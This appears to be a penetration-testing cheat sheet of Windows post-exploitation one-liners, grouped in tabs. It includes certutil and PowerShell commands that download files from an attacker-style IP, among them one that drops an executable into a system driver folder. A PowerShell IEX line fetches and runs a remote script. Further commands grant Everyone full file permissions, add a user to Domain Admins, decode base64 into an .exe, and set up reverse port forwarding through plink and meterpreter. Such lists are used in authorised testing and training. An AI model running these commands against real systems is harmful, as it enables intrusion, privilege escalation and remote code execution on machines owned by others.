# 99 Basic Command

{% tabs %}
{% tab title="Downloading files" %}

```
// File Download
certutil.exe -urlcache -split -f http://ip/file file 
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"

// Powershell download
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'" 

// Powershell remote execution
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" 
```

{% endtab %}

{% tab title="Changing Permissions of a file" %}

```
icacls text.txt /grant Everyone:F
```

{% endtab %}

{% tab title="Adding user to Domain admins" %}

```
Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose
```

{% endtab %}

{% tab title="Base64 Encode-Decode" %}

```
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64
```

{% endtab %}

{% tab title="Port Forwarding" %}

```
# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56
```

{% endtab %}
{% endtabs %}